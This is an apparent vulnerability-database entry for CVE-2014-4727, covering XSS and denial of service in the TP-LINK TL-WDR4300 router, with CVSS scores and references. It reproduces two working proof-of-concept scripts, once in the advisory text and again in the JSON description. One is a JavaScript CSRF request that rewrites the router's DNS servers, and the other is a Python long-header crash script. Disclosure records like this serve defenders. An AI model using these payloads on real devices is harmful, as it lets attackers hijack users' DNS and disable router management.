VAR-201409-0077

Vulnerability from variot - Updated: 2025-04-13 23:31

Cross-site scripting (XSS) vulnerability in the DHCP clients page in the TP-LINK N750 Wireless Dual Band Gigabit Router (TL-WDR4300) with firmware before 140916 allows remote attackers to inject arbitrary web script or HTML via the hostname in a DHCP request. TP-Link is a well-known supplier of network and communication equipment. The TP-LINK WDR4300 has an HTML injection vulnerability because it does not adequately filter user-supplied input. Allows an attacker to exploit this vulnerability to execute arbitrary HTML or script code in the browser of an uninformed user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. TP-LINK WDR4300 running firmware version 130617 is vulnerable; other versions may also be affected. TP-LINK N750 Wireless Dual Band Gigabit Router (TL-WDR4300) is a wireless dual-band Gigabit router product of China Pulian (TP-LINK) company. Advisory Information ===============

Vendors Contacted: TP-LINK Vendor Patched: Yes, Firmware 140916 System Affected: N750 Wireless Dual Band Gigabit Router (TL-WDR4300), might affect others.

DoS (web server) -

Denial of service condition to the device web server, remotely or locally send the device a "GET" request with an extra "Header" with a long value (A x 3000 times).

Proof of Concept:

http://elisyan.com/tplink/wdr4300.html

---- start wdr4300.html ---- / Author: Oz Elisyan Title: TP-LINK WDR4300 XSS to CSRF (the device has Referer check) /

var xmlhttp; if (window.XMLHttpRequest) {// code for IE7+, Firefox, Chrome, Opera, Safari xmlhttp=new XMLHttpRequest(); } else {// code for IE6, IE5 xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); } xmlhttp.onreadystatechange=function() { if (xmlhttp.readyState==4 && xmlhttp.status==200) { document.getElementById("myDiv").innerHTML=xmlhttp.responseText; } } xmlhttp.open("GET","/userRpm/WanDynamicIpCfgRpm.htm?wan=0&mtu=1500&manual=2&dnsserver=X.X.X.X&dnsserver2=X.X.X.X&hostName=&Save=Save",true); xmlhttp.send();

---- end wdr4300.html ----

http://elisyan.com/tplink/wdr4300.py

---- start wdr4300.py ----

Author: Oz Elisyan

TP-Link WDR4300 DoS PoC

import httplib

conn = httplib.HTTPConnection("192.168.0.1") headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain", "DoS": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} conn.request("GET","/", "Let me tell you something", headers)

print "Done"

---- end wdr4300.py ----

Report Timeline:

2014-07-04: Vendor notified about the vulnerabilities with all the relevant technical information.

2013-09-16: Vendor released a fix.

Credits:

The Vulnerabilities was discovered by Oz Elisyan.

References:

http://www.tp-link.com/lk/products/details/?model=TL-WDR4300

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201409-0077",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "tl-wdr4300",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "tp link",
        "version": "130617"
      },
      {
        "model": "tl-wdr4300",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-wdr4300",
        "scope": null,
        "trust": 0.8,
        "vendor": "tp link",
        "version": null
      },
      {
        "model": "tl-wdr4300",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "tp link",
        "version": "140916"
      },
      {
        "model": "wdr4300 running",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "tp link",
        "version": "130617"
      },
      {
        "model": "tl-wdr4300",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "tp link",
        "version": "130617"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-06261"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-004485"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201409-1169"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-4727"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/h:tp-link:tl-wdr4300",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:tp-link:tl-wdr4300_firmware",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-004485"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Oz Elisyan",
    "sources": [
      {
        "db": "BID",
        "id": "70037"
      },
      {
        "db": "PACKETSTORM",
        "id": "128343"
      }
    ],
    "trust": 0.4
  },
  "cve": "CVE-2014-4727",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "CVE-2014-4727",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 1.8,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2014-06261",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "VHN-72668",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2014-4727",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "NVD",
            "id": "CVE-2014-4727",
            "trust": 0.8,
            "value": "Medium"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2014-06261",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201409-1169",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-72668",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-06261"
      },
      {
        "db": "VULHUB",
        "id": "VHN-72668"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-004485"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201409-1169"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-4727"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Cross-site scripting (XSS) vulnerability in the DHCP clients page in the TP-LINK N750 Wireless Dual Band Gigabit Router (TL-WDR4300) with firmware before 140916 allows remote attackers to inject arbitrary web script or HTML via the hostname in a DHCP request. TP-Link is a well-known supplier of network and communication equipment. The TP-LINK WDR4300 has an HTML injection vulnerability because it does not adequately filter user-supplied input. Allows an attacker to exploit this vulnerability to execute arbitrary HTML or script code in the browser of an uninformed user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. \nTP-LINK WDR4300 running firmware version 130617 is vulnerable; other versions may also be affected. TP-LINK N750 Wireless Dual Band Gigabit Router (TL-WDR4300) is a wireless dual-band Gigabit router product of China Pulian (TP-LINK) company. Advisory Information\n===============\n\nVendors Contacted: TP-LINK\nVendor Patched: Yes, Firmware 140916\nSystem Affected: N750 Wireless Dual Band Gigabit Router (TL-WDR4300), might affect others. \n\n# DoS (web server) -\nDenial of service condition to the device web server, remotely or locally send the\ndevice a \"GET\" request with an extra \"Header\" with a long value (A x 3000 times). \n\n\nProof of Concept:\n============\n\nhttp://elisyan.com/tplink/wdr4300.html\n\n---- start wdr4300.html ----\n/*\nAuthor: Oz Elisyan\nTitle: TP-LINK WDR4300 XSS to CSRF (the device has Referer check)\n*/\n\n\n\nvar xmlhttp;\nif (window.XMLHttpRequest)\n  {// code for IE7+, Firefox, Chrome, Opera, Safari\n  xmlhttp=new XMLHttpRequest();\n  }\nelse\n  {// code for IE6, IE5\n  xmlhttp=new ActiveXObject(\"Microsoft.XMLHTTP\");\n  }\nxmlhttp.onreadystatechange=function()\n  {\n  if (xmlhttp.readyState==4 \u0026\u0026 xmlhttp.status==200)\n    {\n    document.getElementById(\"myDiv\").innerHTML=xmlhttp.responseText;\n    }\n  }\nxmlhttp.open(\"GET\",\"/userRpm/WanDynamicIpCfgRpm.htm?wan=0\u0026mtu=1500\u0026manual=2\u0026dnsserver=X.X.X.X\u0026dnsserver2=X.X.X.X\u0026hostName=\u0026Save=Save\",true);\nxmlhttp.send();\n\n\n\n---- end wdr4300.html ----\n\nhttp://elisyan.com/tplink/wdr4300.py\n\n---- start wdr4300.py ----\n#Author: Oz Elisyan\n#TP-Link WDR4300 DoS PoC\n\nimport httplib\n\nconn = httplib.HTTPConnection(\"192.168.0.1\")\nheaders = {\"Content-type\": \"application/x-www-form-urlencoded\",\n\"Accept\": \"text/plain\", \"DoS\": \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"}\nconn.request(\"GET\",\"/\", \"Let me tell you something\", headers)\n\nprint \"Done\"\n\n---- end wdr4300.py ----\n\n\nReport Timeline:\n===========\n\n2014-07-04:\nVendor notified about the vulnerabilities with all the relevant technical information. \n\n2013-09-16:\nVendor released a fix. \n\nCredits:\n======\n\nThe Vulnerabilities was discovered by Oz Elisyan. \n\n\nReferences:\n========\n\nhttp://www.tp-link.com/lk/products/details/?model=TL-WDR4300\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-4727"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-004485"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2014-06261"
      },
      {
        "db": "BID",
        "id": "70037"
      },
      {
        "db": "VULHUB",
        "id": "VHN-72668"
      },
      {
        "db": "PACKETSTORM",
        "id": "128343"
      }
    ],
    "trust": 2.61
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2014-4727",
        "trust": 3.5
      },
      {
        "db": "BID",
        "id": "70037",
        "trust": 2.6
      },
      {
        "db": "PACKETSTORM",
        "id": "128343",
        "trust": 1.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-004485",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2014-06261",
        "trust": 0.6
      },
      {
        "db": "XF",
        "id": "96139",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201409-1169",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-72668",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-06261"
      },
      {
        "db": "VULHUB",
        "id": "VHN-72668"
      },
      {
        "db": "BID",
        "id": "70037"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-004485"
      },
      {
        "db": "PACKETSTORM",
        "id": "128343"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201409-1169"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-4727"
      }
    ]
  },
  "id": "VAR-201409-0077",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-06261"
      },
      {
        "db": "VULHUB",
        "id": "VHN-72668"
      }
    ],
    "trust": 1.7
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-06261"
      }
    ]
  },
  "last_update_date": "2025-04-13T23:31:37.568000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "TL-WDR4300",
        "trust": 0.8,
        "url": "http://www.tp-link.com/lk/products/details/?model=TL-WDR4300"
      },
      {
        "title": "TP-LINK WDR4300 HTML Injection Vulnerability Patch",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/50289"
      },
      {
        "title": "TL-WDR4300_v1_140916",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=56684"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-06261"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-004485"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201409-1169"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-79",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-72668"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-004485"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-4727"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "http://seclists.org/fulldisclosure/2014/sep/80"
      },
      {
        "trust": 2.3,
        "url": "http://www.securityfocus.com/bid/70037"
      },
      {
        "trust": 1.7,
        "url": "http://packetstormsecurity.com/files/128343/tp-link-wdr4300-xss-denial-of-service.html"
      },
      {
        "trust": 1.1,
        "url": "http://www.securityfocus.com/archive/1/533501/100/0/threaded"
      },
      {
        "trust": 1.1,
